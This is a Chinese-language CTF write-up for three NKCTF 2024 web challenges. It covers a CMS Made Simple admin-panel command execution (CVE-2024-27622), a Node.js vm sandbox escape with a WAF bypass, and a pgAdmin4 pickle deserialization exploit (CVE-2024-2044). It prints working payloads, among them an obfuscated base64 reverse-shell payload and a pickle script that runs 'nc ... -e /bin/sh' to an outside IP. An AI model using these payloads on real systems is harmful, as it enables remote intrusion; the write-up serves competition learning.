【Web】NKCTF 2024 个人wp(部分)

news/2024/5/12 17:36:54

my first cms

全世界最简单的CTF

attack_tacooooo

属实太菜了，3/4

my first cms

一眼搜版本2.2.19

CVE -CVE-2024-27622

GitHub - capture0x/CMSMadeSimple

访问/admin/login.php

爆出弱口令，后台登录

admin Admin123

Extensions > User Defined Tags -> Add User Defined Tag，写入恶意命令

点击Run执行拿到flag

全世界最简单的CTF

首先访问/secret得到源码

const express = require('express');
const bodyParser = require('body-parser');
const app = express();
const fs = require("fs");
const path = require('path');
const vm = require("vm");app
.use(bodyParser.json())
.set('views', path.join(__dirname, 'views'))
.use(express.static(path.join(__dirname, '/public')))app.get('/', function (req, res){res.sendFile(__dirname + '/public/home.html');
})function waf(code) {let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g;if(code.match(pattern)){throw new Error("what can I say? hacker out!!");}
}app.post('/', function (req, res){let code = req.body.code;let sandbox = Object.create(null);let context = vm.createContext(sandbox);try {waf(code)let result = vm.runInContext(code, context);console.log(result);} catch (e){console.log(e.message);require('./hack');}
})app.get('/secret', function (req, res){if(process.__filename == null) {let content = fs.readFileSync(__filename, "utf-8");return res.send(content);} else {let content = fs.readFileSync(process.__filename, "utf-8");return res.send(content);}
})app.listen(3000, ()=>{console.log("listen on 3000");
})

这一段就是要打vm2沙箱逃逸了，原理：NodeJS VM沙箱逃逸-CSDN博客

app.post('/', function (req, res){
let code = req.body.code;
let sandbox = Object.create(null);
let context = vm.createContext(sandbox);
try {
waf(code)
let result = vm.runInContext(code, context);
console.log(result);
} catch (e){
console.log(e.message);
require('./hack');
}
})

这题如果没有过滤，exp应该这样写

throw new Proxy({}, {
    get: function(){
        const c = arguments.callee.caller;
        const p = (c.constructor.constructor('return process'))();
        return p.mainModule.require('child_process').execSync('whoami').toString();
   }
})

题目的waf是

let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g;

把过滤掉的关键字都换成这种模板文字，process可以用下面方法

(`${`${`child_proces`}s`}`)
.execSync转成[`${`${`exe`}cSync`}`]

但是中括号 [ ]被waf了，所以想到child_process下面有5个函数，只剩下fork函数了

那么思路就是在上面payload基础上，通过fs进行文件写文件，然后用fork进行加载

为了逃逸waf，可以逆序内容，然后再反序过来，写入文件后再调用fork加载达到反弹shell

由于过滤了 + ，所以 base64 编码后有 + 号的要再编码一次

为了引号优先级不冲突， content 赋值要用反引号括起来，const content=` 内容 `

payload:

throw new Proxy({}, {get: function(){const content = `;)"'}i-,hsab{|}d-,46esab{|}d-,46esab{|}9UkaKtSQEl0MNpXT4hTeNpHNp5keFpGT5lkaNVXUq1Ee4M0YqJ1MMJjVHpldBlmSrE0UhRXQDFmeG1WW,ohce{' c- hsab"(cexe;)"ssecorp_dlihc"(eriuqer = } cexe { tsnoc`;const reversedContent = content.split('').reverse().join('');	const c = arguments.callee.caller;const p = (c.constructor.constructor(`${`${`return proces`}s`}`))();p.mainModule.require('fs').writeFileSync('/tmp/test1.js', reversedContent);return p.mainModule.require(`${`${`child_proces`}s`}`).fork('/tmp/test1.js').toString();}
})

监听端口，成功反弹shell

attack_tacooooo

开搜pgAdmin4CVE

【漏洞通告】pgAdmin4反序列化代码执行漏洞（CVE-2024-2044）-启明星辰

Shielder - pgAdmin (<=8.3) Path Traversal in Session Handling Leads to Unsafe Deserialization and Remote Code Execution (RCE)

根据题目提示，tacooooo@qq.com，tacooooo 登录

exp.py(题目环境没有curl和bash命令，所以用nc反弹)

import os
import pickleclass exp(object):def __reduce__(self):s = """nc 124.222.136.33 1337 -e /bin/sh"""return os.system, (s,)
e = exp()
with open("./posix.pickle", "wb") as f:pickle.dump(e, f)

访问Storage Manager